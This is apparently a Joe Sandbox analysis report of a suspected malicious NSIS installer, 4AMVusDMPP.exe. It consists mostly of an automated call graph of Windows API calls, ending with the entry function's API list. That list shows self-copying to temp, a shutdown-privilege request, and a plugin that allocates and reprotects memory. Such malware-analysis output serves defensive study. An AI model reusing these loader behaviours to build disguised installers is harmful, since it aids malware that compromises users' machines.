4239->4237 4239->4238 4240->4168 4277 405eb9 GetFileAttributesW 4241->4277 4244 405ad5 DeleteFileW 4246 405adb 4244->4246 4245 405acd RemoveDirectoryW 4245->4246 4247 405adf 4246->4247 4248 405aeb SetFileAttributesW 4246->4248 4247->4168 4248->4247 4250 40546b 4249->4250 4259 40550d 4249->4259 4251 405487 lstrlenW 4250->4251 4252 40640a 17 API calls 4250->4252 4253 4054b0 4251->4253 4254 405495 lstrlenW 4251->4254 4252->4251 4255 4054c3 4253->4255 4256 4054b6 SetWindowTextW 4253->4256 4257 4054a7 lstrcatW 4254->4257 4254->4259 4258 4054c9 SendMessageW SendMessageW SendMessageW 4255->4258 4255->4259 4256->4255 4257->4253 4258->4259 4259->4168 4261 4061cf 4260->4261 4262 4061c2 4260->4262 4261->4168 4280 406034 4262->4280 4265 406741 FindClose 4264->4265 4266 405c7e 4264->4266 4265->4266 
4266->4144 4266->4157 4268 405c88 4267->4268 4269 405cd9 lstrcatW 4267->4269 4268->4162 4269->4268 4270->4223 4272 405d85 4271->4272 4274 405d97 4271->4274 4272->4274 4275 405d92 CharNextW 4272->4275 4273 405dbb 4273->4225 4273->4227 4274->4273 4276 405cea CharNextW 4274->4276 4275->4273 4276->4274 4278 405abe 4277->4278 4279 405ecb SetFileAttributesW 4277->4279 4278->4244 4278->4245 4278->4247 4279->4278 4281 406064 4280->4281 4282 40608a GetShortPathNameW 4280->4282 4307 405ede GetFileAttributesW CreateFileW 4281->4307 4284 4061a9 4282->4284 4285 40609f 4282->4285 4284->4261 4285->4284 4287 4060a7 wsprintfA 4285->4287 4286 40606e CloseHandle GetShortPathNameW 4286->4284 4288 406082 4286->4288 4289 40640a 17 API calls 4287->4289 4288->4282 4288->4284 4290 4060cf 4289->4290 4308 405ede GetFileAttributesW CreateFileW 4290->4308 4292 4060dc 4292->4284 4293 4060eb GetFileSize GlobalAlloc 4292->4293 4294 4061a2 CloseHandle 4293->4294 4295 40610d 4293->4295 4294->4284 4309 405f61 ReadFile 4295->4309 4300 406140 4302 405e43 4 API calls 4300->4302 4301 40612c lstrcpyA 4303 40614e 4301->4303 4302->4303 4304 406185 SetFilePointer 4303->4304 4316 405f90 WriteFile 4304->4316 4307->4286 4308->4292 4310 405f7f 4309->4310 4310->4294 4311 405e43 lstrlenA 4310->4311 4312 405e84 lstrlenA 4311->4312 4313 405e8c 4312->4313 4314 405e5d lstrcmpiA 4312->4314 4313->4300 4313->4301 4314->4313 4315 405e7b CharNextA 4314->4315 4315->4312 4317 405fae GlobalFree 4316->4317 4317->4294 4318 4015c1 4319 402c41 17 API calls 4318->4319 4320 4015c8 4319->4320 4321 405d68 4 API calls 4320->4321 4333 4015d1 4321->4333 4322 401631 4324 401663 4322->4324 4325 401636 4322->4325 4323 405cea CharNextW 4323->4333 4327 401423 24 API calls 4324->4327 4345 401423 4325->4345 4335 40165b 4327->4335 4332 40164a SetCurrentDirectoryW 4332->4335 4333->4322 4333->4323 4334 401617 GetFileAttributesW 4333->4334 4337 4059b9 4333->4337 4340 40591f CreateDirectoryW 4333->4340 4349 40599c CreateDirectoryW 4333->4349 
4334->4333 4352 4067c2 GetModuleHandleA 4337->4352 4341 405970 GetLastError 4340->4341 4342 40596c 4340->4342 4341->4342 4343 40597f SetFileSecurityW 4341->4343 4342->4333 4343->4342 4344 405995 GetLastError 4343->4344 4344->4342 4346 405450 24 API calls 4345->4346 4347 401431 4346->4347 4348 4063e8 lstrcpynW 4347->4348 4348->4332 4350 4059b0 GetLastError 4349->4350 4351 4059ac 4349->4351 4350->4351 4351->4333 4353 4067e8 GetProcAddress 4352->4353 4354 4067de 4352->4354 4355 4059c0 4353->4355 4358 406752 GetSystemDirectoryW 4354->4358 4355->4333 4357 4067e4 4357->4353 4357->4355 4359 406774 wsprintfW LoadLibraryExW 4358->4359 4359->4357 4361 4053c4 4362 4053d4 4361->4362 4363 4053e8 4361->4363 4364 405431 4362->4364 4365 4053da 4362->4365 4366 4053f0 IsWindowVisible 4363->4366 4372 405410 4363->4372 4367 405436 CallWindowProcW 4364->4367 4375 4043ab 4365->4375 4366->4364 4369 4053fd 4366->4369 4370 4053e4 4367->4370 4378 404d1a SendMessageW 4369->4378 4372->4367 4383 404d9a 4372->4383 4376 4043c3 4375->4376 4377 4043b4 SendMessageW 4375->4377 4376->4370 4377->4376 4379 404d79 SendMessageW 4378->4379 4380 404d3d GetMessagePos ScreenToClient SendMessageW 4378->4380 4381 404d71 4379->4381 4380->4381 4382 404d76 4380->4382 4381->4372 4382->4379 4392 4063e8 lstrcpynW 4383->4392 4385 404dad 4393 40632f wsprintfW 4385->4393 4387 404db7 4394 40140b 4387->4394 4391 404dc7 4391->4364 4392->4385 4393->4387 4398 401389 4394->4398 4397 4063e8 lstrcpynW 4397->4391 4400 401390 4398->4400 4399 4013fe 4399->4397 4400->4399 4401 4013cb MulDiv SendMessageW 4400->4401 4401->4400 4846 401e49 4847 402c1f 17 API calls 4846->4847 4848 401e4f 4847->4848 4849 402c1f 17 API calls 4848->4849 4850 401e5b 4849->4850 4851 401e72 EnableWindow 4850->4851 4852 401e67 ShowWindow 4850->4852 4853 402ac5 4851->4853 4852->4853 4854 40264a 4855 402c1f 17 API calls 4854->4855 4856 402659 4855->4856 4857 4026a3 ReadFile 4856->4857 4858 405f61 ReadFile 4856->4858 4859 4026e3 MultiByteToWideChar 4856->4859 
4860 402798 4856->4860 4863 40273c 4856->4863 4864 402709 SetFilePointer MultiByteToWideChar 4856->4864 4865 4027a9 4856->4865 4867 402796 4856->4867 4857->4856 4857->4867 4858->4856 4859->4856 4877 40632f wsprintfW 4860->4877 4863->4856 4863->4867 4868 405fbf SetFilePointer 4863->4868 4864->4856 4866 4027ca SetFilePointer 4865->4866 4865->4867 4866->4867 4869 405ff3 4868->4869 4870 405fdb 4868->4870 4869->4863 4871 405f61 ReadFile 4870->4871 4872 405fe7 4871->4872 4872->4869 4873 406024 SetFilePointer 4872->4873 4874 405ffc SetFilePointer 4872->4874 4873->4869 4874->4873 4875 406007 4874->4875 4876 405f90 WriteFile 4875->4876 4876->4869 4877->4867 4878 404dcc GetDlgItem GetDlgItem 4879 404e1e 7 API calls 4878->4879 4887 405037 4878->4887 4880 404ec1 DeleteObject 4879->4880 4881 404eb4 SendMessageW 4879->4881 4882 404eca 4880->4882 4881->4880 4883 404f01 4882->4883 4885 404ed9 4882->4885 4889 40435f 18 API calls 4883->4889 4884 40511b 4890 4051c7 4884->4890 4896 4053af 4884->4896 4901 405174 SendMessageW 4884->4901 4886 40640a 17 API calls 4885->4886 4891 404ee3 SendMessageW SendMessageW 4886->4891 4887->4884 4888 4050fc 4887->4888 4894 405097 4887->4894 4888->4884 4898 40510d SendMessageW 4888->4898 4895 404f15 4889->4895 4892 4051d1 SendMessageW 4890->4892 4893 4051d9 4890->4893 4891->4882 4892->4893 4903 4051f2 4893->4903 4904 4051eb ImageList_Destroy 4893->4904 4920 405202 4893->4920 4899 404d1a 5 API calls 4894->4899 4900 40435f 18 API calls 4895->4900 4897 4043c6 8 API calls 4896->4897 4902 4053bd 4897->4902 4898->4884 4925 4050a8 4899->4925 4905 404f23 4900->4905 4901->4896 4907 405189 SendMessageW 4901->4907 4908 4051fb GlobalFree 4903->4908 4903->4920 4904->4903 4909 404ff8 GetWindowLongW SetWindowLongW 4905->4909 4916 404ff2 4905->4916 4919 404f73 SendMessageW 4905->4919 4923 404fc0 SendMessageW 4905->4923 4924 404faf SendMessageW 4905->4924 4906 405371 4906->4896 4912 405383 ShowWindow GetDlgItem ShowWindow 4906->4912 4910 40519c 4907->4910 4908->4920 
4911 405011 4909->4911 4915 4051ad SendMessageW 4910->4915 4913 405017 ShowWindow 4911->4913 4914 40502f 4911->4914 4912->4896 4934 404394 SendMessageW 4913->4934 4935 404394 SendMessageW 4914->4935 4915->4890 4916->4909 4916->4911 4919->4905 4920->4906 4921 404d9a 4 API calls 4920->4921 4927 40523d 4920->4927 4921->4927 4922 40502a 4922->4896 4923->4905 4924->4905 4925->4888 4926 405347 InvalidateRect 4926->4906 4928 40535d 4926->4928 4929 40526b SendMessageW 4927->4929 4931 405281 4927->4931 4936 404cd5 4928->4936 4929->4931 4930 4052e2 4933 4052f5 SendMessageW SendMessageW 4930->4933 4931->4926 4931->4930 4931->4933 4933->4931 4934->4922 4935->4887 4939 404c0c 4936->4939 4938 404cea 4938->4906 4940 404c25 4939->4940 4941 40640a 17 API calls 4940->4941 4942 404c89 4941->4942 4943 40640a 17 API calls 4942->4943 4944 404c94 4943->4944 4945 40640a 17 API calls 4944->4945 4946 404caa lstrlenW wsprintfW SetDlgItemTextW 4945->4946 4946->4938 5278 4016cc 5279 402c41 17 API calls 5278->5279 5280 4016d2 GetFullPathNameW 5279->5280 5281 4016ec 5280->5281 5287 40170e 5280->5287 5284 40672b 2 API calls 5281->5284 5281->5287 5282 401723 GetShortPathNameW 5283 402ac5 5282->5283 5285 4016fe 5284->5285 5285->5287 5288 4063e8 lstrcpynW 5285->5288 5287->5282 5287->5283 5288->5287 5289 40234e 5290 402c41 17 API calls 5289->5290 5291 40235d 5290->5291 5292 402c41 17 API calls 5291->5292 5293 402366 5292->5293 5294 402c41 17 API calls 5293->5294 5295 402370 GetPrivateProfileStringW 5294->5295 5296 4044cf lstrlenW 5297 4044f0 WideCharToMultiByte 5296->5297 5298 4044ee 5296->5298 5298->5297 5299 404850 5300 40487c 5299->5300 5301 40488d 5299->5301 5360 405a32 GetDlgItemTextW 5300->5360 5303 404899 GetDlgItem 5301->5303 5308 4048f8 5301->5308 5306 4048ad 5303->5306 5304 4049dc 5357 404b8b 5304->5357 5362 405a32 GetDlgItemTextW 5304->5362 5305 404887 5307 40667c 5 API calls 5305->5307 5310 4048c1 SetWindowTextW 5306->5310 5311 405d68 4 API calls 5306->5311 5307->5301 5308->5304 5312 
40640a 17 API calls 5308->5312 5308->5357 5314 40435f 18 API calls 5310->5314 5316 4048b7 5311->5316 5317 40496c SHBrowseForFolderW 5312->5317 5313 404a0c 5318 405dc5 18 API calls 5313->5318 5319 4048dd 5314->5319 5315 4043c6 8 API calls 5320 404b9f 5315->5320 5316->5310 5324 405cbd 3 API calls 5316->5324 5317->5304 5321 404984 CoTaskMemFree 5317->5321 5322 404a12 5318->5322 5323 40435f 18 API calls 5319->5323 5325 405cbd 3 API calls 5321->5325 5363 4063e8 lstrcpynW 5322->5363 5326 4048eb 5323->5326 5324->5310 5327 404991 5325->5327 5361 404394 SendMessageW 5326->5361 5330 4049c8 SetDlgItemTextW 5327->5330 5335 40640a 17 API calls 5327->5335 5330->5304 5331 4048f1 5333 4067c2 5 API calls 5331->5333 5332 404a29 5334 4067c2 5 API calls 5332->5334 5333->5308 5341 404a30 5334->5341 5336 4049b0 lstrcmpiW 5335->5336 5336->5330 5339 4049c1 lstrcatW 5336->5339 5337 404a71 5364 4063e8 lstrcpynW 5337->5364 5339->5330 5340 404a78 5342 405d68 4 API calls 5340->5342 5341->5337 5345 405d09 2 API calls 5341->5345 5347 404ac9 5341->5347 5343 404a7e GetDiskFreeSpaceW 5342->5343 5346 404aa2 MulDiv 5343->5346 5343->5347 5345->5341 5346->5347 5348 404cd5 20 API calls 5347->5348 5358 404b3a 5347->5358 5351 404b27 5348->5351 5349 40140b 2 API calls 5350 404b5d 5349->5350 5365 404381 EnableWindow 5350->5365 5353 404b3c SetDlgItemTextW 5351->5353 5354 404b2c 5351->5354 5353->5358 5356 404c0c 20 API calls 5354->5356 5355 404b79 5355->5357 5366 4047a9 5355->5366 5356->5358 5357->5315 5358->5349 5358->5350 5360->5305 5361->5331 5362->5313 5363->5332 5364->5340 5365->5355 5367 4047b7 5366->5367 5368 4047bc SendMessageW 5366->5368 5367->5368 5368->5357 5369 401b53 5370 402c41 17 API calls 5369->5370 5371 401b5a 5370->5371 5372 402c1f 17 API calls 5371->5372 5373 401b63 wsprintfW 5372->5373 5374 402ac5 5373->5374 5375 401956 5376 402c41 17 API calls 5375->5376 5377 40195d lstrlenW 5376->5377 5378 402592 5377->5378 5379 6eab103d 5382 6eab101b 5379->5382 5389 6eab1516 5382->5389 5384 6eab1020 
5385 6eab1027 GlobalAlloc 5384->5385 5386 6eab1024 5384->5386 5385->5386 5387 6eab153d 3 API calls 5386->5387 5388 6eab103b 5387->5388 5390 6eab151c 5389->5390 5391 6eab1522 5390->5391 5392 6eab152e GlobalFree 5390->5392 5391->5384 5392->5384 5400 4014d7 5401 402c1f 17 API calls 5400->5401 5402 4014dd Sleep 5401->5402 5404 402ac5 5402->5404 5405 401f58 5406 402c41 17 API calls 5405->5406 5407 401f5f 5406->5407 5408 40672b 2 API calls 5407->5408 5409 401f65 5408->5409 5410 401f76 5409->5410 5412 40632f wsprintfW 5409->5412 5412->5410 5413 402259 5414 402c41 17 API calls 5413->5414 5415 40225f 5414->5415 5416 402c41 17 API calls 5415->5416 5417 402268 5416->5417 5418 402c41 17 API calls 5417->5418 5419 402271 5418->5419 5420 40672b 2 API calls 5419->5420 5421 40227a 5420->5421 5422 40228b lstrlenW lstrlenW 5421->5422 5423 40227e 5421->5423 5425 405450 24 API calls 5422->5425 5424 405450 24 API calls 5423->5424 5426 402286 5424->5426 5427 4022c9 SHFileOperationW 5425->5427 5427->5423 5427->5426 5269 40175c 5270 402c41 17 API calls 5269->5270 5271 401763 5270->5271 5272 405f0d 2 API calls 5271->5272 5273 40176a 5272->5273 5274 405f0d 2 API calls 5273->5274 5274->5273 5428 401d5d GetDlgItem GetClientRect 5429 402c41 17 API calls 5428->5429 5430 401d8f LoadImageW SendMessageW 5429->5430 5431 402ac5 5430->5431 5432 401dad DeleteObject 5430->5432 5432->5431 5433 4022dd 5434 4022e4 5433->5434 5437 4022f7 5433->5437 5435 40640a 17 API calls 5434->5435 5436 4022f1 5435->5436 5438 405a4e MessageBoxIndirectW 5436->5438 5438->5437 5439 401563 5440 402a6b 5439->5440 5443 40632f wsprintfW 5440->5443 5442 402a70 5443->5442 4402 4023e4 4403 402c41 17 API calls 4402->4403 4404 4023f6 4403->4404 4405 402c41 17 API calls 4404->4405 4406 402400 4405->4406 4419 402cd1 4406->4419 4409 402438 4415 402444 4409->4415 4423 402c1f 4409->4423 4410 40288b 4411 402c41 17 API calls 4412 40242e lstrlenW 4411->4412 4412->4409 4414 402463 RegSetValueExW 4417 402479 RegCloseKey 4414->4417 4415->4414 
[Call-graph data. In the original report this section is an interactive graph of numbered nodes (function addresses with the Windows APIs they call) and call edges; the raw node/edge stream did not survive extraction as a readable figure and starts mid-graph. The functions and API calls that can be recovered from it are summarised below by address. Entries of the form "N API calls" are callees the report did not expand.]

Main image (0x401000-0x4072e1):
- Entry/installer driver 0x4034a5: SetErrorMode, GetVersion, lstrlenA (0x403500), ordinal #17 / OleInitialize / SHGetFileInfoW (0x40352a), GetCommandLineW (0x403576), CharNextW (0x405cea, 0x4035ad), GetTempPathW (0x4036d7), GetWindowsDirectoryW / lstrcatW (0x4036f3), GetTempPathW / lstrcatW / SetEnvironmentVariableW x2 (0x403713), DeleteFileW (0x403749), OleUninitialize (0x403819), ExitProcess (0x403838).
- Privilege and shutdown path 0x40394a-0x4039ce: GetCurrentProcess / OpenProcessToken (0x403952), LookupPrivilegeValueW / AdjustTokenPrivileges (0x40396a), ExitWindowsEx (0x4039ba), ExitProcess (0x4039ce).
- Embedded-data and file handling: GetTickCount / GetModuleFileNameW (0x402f30), GetFileSize (0x402fa7), GlobalAlloc (0x4030eb), CreateFileW (0x403113), SetFilePointer (0x40345d, 0x403317, 0x403417, 0x4031e5, 0x40280c), ReadFile (0x405f61, 0x403447), WriteFile (0x405f90), GetTickCount / GetTempFileNameW (0x405f1a), SetCurrentDirectoryW (0x40388e), DeleteFileW (0x4038e8), CopyFileW (0x4038f5), CreateProcessW (0x4059d1), CloseHandle (0x403929, 0x4039f7, 0x403a0b, 0x405a04).
- File operations: FindFirstFileW (0x40286f), FindNextFileW (0x402847), FindClose (0x40282f), MoveFileW (0x401694), SetFileAttributesW (0x4015aa), GetFileAttributesW / CreateFileW (0x405ede), GetFileAttributesW (0x403bf6), CompareFileTime (0x4017cd), SetFileTime (0x4018be), SearchPathW (0x40173c), ExpandEnvironmentStringsW (0x401a39), WritePrivateProfileStringW (0x40233f), WideCharToMultiByte / lstrlenA (0x4025d3).
- Registry: RegOpenKeyExW (0x406255), RegCreateKeyExW (0x40629d), RegQueryValueExW (0x4024a2), RegEnumKeyW (0x402527, 0x402d98), RegEnumValueW (0x402533), RegDeleteValueW (0x4023ae), RegDeleteKeyW (0x402de0), RegCloseKey (0x40254f, 0x4024c8, 0x402daf, 0x402dd0).
- Process and loader: ShellExecuteExW (0x405a14), WaitForSingleObject (0x406873, 0x406894), GetExitCodeProcess (0x40689f), GetModuleHandleW (0x40205c), LoadLibraryExW (0x40206a), GetProcAddress (0x40685b), FreeLibrary (0x4020e8, 0x403a56), CoCreateInstance (0x402172), CreateThread (0x405742).
- Window and dialog code (paint handler 0x401000-0x401167; dialog procedure 0x403e86-0x404489; page dialogs 0x40451e-0x4047cd and 0x404809; a dialog at 0x40558f-0x4058fe with CreatePopupMenu / AppendMenuW / TrackPopupMenu and a clipboard copy via OpenClipboard / EmptyClipboard / GlobalLock / SetClipboardData / CloseClipboard): DefWindowProcW, BeginPaint / EndPaint, CreateBrushIndirect / FillRect / DeleteObject, CreateFontIndirectW (0x401102, 0x401e39), GetDC / GetDeviceCaps / MulDiv / ReleaseDC (0x401db9-0x401dcb), RegisterClassW / CreateWindowExW / SystemParametersInfoW (0x403c56-0x403c8c), LoadImageW (0x403c2f), GetClassInfoW, DialogBoxParamW (0x403d48), CreateDialogParamW (0x402f0a, 0x404244), PeekMessageW / DispatchMessageW (0x4067fe), SendMessageW, SendMessageTimeoutW (0x401c81), FindWindowExW (0x401cbd), SetWindowTextW, SetDlgItemTextW, GetDlgItemTextW (0x405a32), MessageBoxIndirectW (0x405a4e, 0x405a77), SetTimer (0x402e05), SetForegroundWindow (0x4014f5), PostQuitMessage (0x4014ac), InvalidateRect (0x402abe), SHGetPathFromIDListW (0x404bd8), KiUserCallbackDispatcher (0x40412e), GetSysColor / SetBkMode / SetTextColor / SetBkColor (0x4043c6), LoadCursorW / SetCursor (0x404704, 0x404733), OleInitialize / OleUninitialize (0x405523 / 0x40557f).
- String helpers called throughout: lstrcpynW (0x4063e8), wsprintfW (0x40632f), lstrlenW / lstrcmpW / lstrcmpiW, and the unexpanded helpers 0x402c1f, 0x402c41 and 0x40640a ("17 API calls" each).

Second module at 0x6eab1000 (entered at 0x6eab1777 from the main image's LoadLibraryExW / GetProcAddress sequence at 0x40206a-0x4020ab; reading it as a plugin DLL loaded by the installer is the editor's interpretation of the graph):
- Import resolution by name: GetModuleHandleW (0x6eab21b4), LoadLibraryW (0x6eab21c5), WideCharToMultiByte / GlobalAlloc / GetProcAddress / GlobalFree (0x6eab161d), GetProcAddress (0x6eab2216).
- Memory: VirtualAlloc (0x6eab26c6), VirtualProtect (0x6eab29a3), VirtualFree (0x6eab16b7), GlobalAlloc / GlobalFree / GlobalSize throughout (0x6eab121b, 0x6eab158f, 0x6eab1516, 0x6eab2372 and others).
- Marshalling: CLSIDFromString (0x6eab247f), StringFromGUID2 (0x6eab260e), MultiByteToWideChar (0x6eab25ec), WideCharToMultiByte (0x6eab2454), lstrcpyW / lstrcpynW / lstrlenW, wsprintfW (0x6eab153d, 0x6eab15d2, 0x6eab2632).
- Other: EnumWindows (0x6eab2b63), GetLastError (0x6eab2a66), and CRT symbols __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z and __allrem at 0x6eab1943.
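The node/edge stream above is easier to work with as a graph than as text. As an added example (not part of the Joe Sandbox report and not the sandbox's own code), the Python below parses that stream into a call graph and queries it, including an ordered-chain check that matches the report's "Contains functionality to shutdown / reboot the system" finding against OpenProcessToken, AdjustTokenPrivileges and ExitWindowsEx. The token layout is an assumption inferred from the dump on this page; SAMPLE is constructed from tokens copied from it; the names parse_graph, reachable_apis, callers_of and api_path are the example's own.

```python
"""Parse a Joe Sandbox execution-graph dump and query the call graph.

Layout assumed from the dump on this page (an assumption, not a documented
format): "<node id> <function address> <API name ...>" declares a node,
"<src>-><dst>" declares a call edge, and "N API calls" marks a callee whose
own calls the report did not expand.
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d{4}$")        # node ids here are 4-digit decimals
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$")   # 0x40xxxx main image, 0x6eabxxxx plugin

# Constructed sample: tokens copied from the dump above, covering the entry
# routine at 0x4034a5 and the privilege/shutdown chain at 0x40394a.
SAMPLE = (
    "4508 4034a5 SetErrorMode GetVersion 4509 4034e4 4508->4509 "
    "4512 4034ea 4508->4512 4510 4067c2 5 API calls 4509->4510 4510->4512 "
    "4511 406752 3 API calls 4513 403500 lstrlenA 4511->4513 4512->4511 "
    "4513->4512 4550 40394a 4553 403952 GetCurrentProcess OpenProcessToken "
    "4550->4553 4554 4039ce ExitProcess 4550->4554 "
    "4559 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4553->4559 "
    "4560 40399e 4553->4560 4559->4560 4564 4067c2 5 API calls 4560->4564 "
    "4567 4039a5 4564->4567 4568 4039ba ExitWindowsEx 4567->4568 "
    "4571 4039c7 4567->4571 4568->4554 4568->4571"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, [api names]); edges
    is a list of (src id, dst id).  Unexpanded callees are kept as the
    pseudo-name '<N API calls>' so they can be filtered out later."""
    tokens = text.split()
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                       # "<id> <address>" starts a node
            nodes[current] = (tokens[i + 1], [])
            i += 2
        elif current is None:
            i += 1                              # stray token before the first node
        elif tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            nodes[current][1].append(f"<{tok} API calls>")
            i += 3
        else:
            nodes[current][1].append(tok)       # an API name attached to the node
            i += 1
    return nodes, edges


def _successors(edges):
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    return succ


def reachable_apis(nodes, edges, root):
    """All real API names called by `root` or by any function it can reach."""
    succ, seen, queue, apis = _successors(edges), {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        apis.update(a for a in nodes.get(n, ("", []))[1] if not a.startswith("<"))
        for d in succ[n]:
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return sorted(apis)


def callers_of(nodes, api):
    """Addresses of the functions that call `api` directly."""
    return sorted(addr for addr, apis in nodes.values() if api in apis)


def api_path(nodes, edges, root, sequence):
    """Witness (addresses) that the APIs in `sequence` are reachable from
    `root` in that order, each search starting at the function that made the
    previous call; None if no such chain exists."""
    succ, frontier, witness = _successors(edges), root, []
    for api in sequence:
        seen, queue, found = {frontier}, deque([frontier]), None
        while queue and found is None:
            n = queue.popleft()
            if api in nodes.get(n, ("", []))[1]:
                found = n
                continue
            for d in succ[n]:
                if d not in seen:
                    seen.add(d)
                    queue.append(d)
        if found is None:
            return None
        witness.append(nodes[found][0])
        frontier = found
    return witness


if __name__ == "__main__":
    g_nodes, g_edges = parse_graph(SAMPLE)
    print(len(g_nodes), "functions,", len(g_edges), "edges")
    print("reboot chain:", api_path(g_nodes, g_edges, "4550",
          ["OpenProcessToken", "AdjustTokenPrivileges", "ExitWindowsEx"]))
```

Feeding the full dump (rather than SAMPLE) to parse_graph gives the same queries over the whole report; api_path is deliberately strict about order, so a function that merely imports the three APIs without a call path between them does not match.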

                                                          Control-flow Graph (function entry 004034A5; graph rendering omitted)
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 004034C8
                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                          • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\4AMVusDMPP.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4AMVusDMPP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3441113951-3530454843
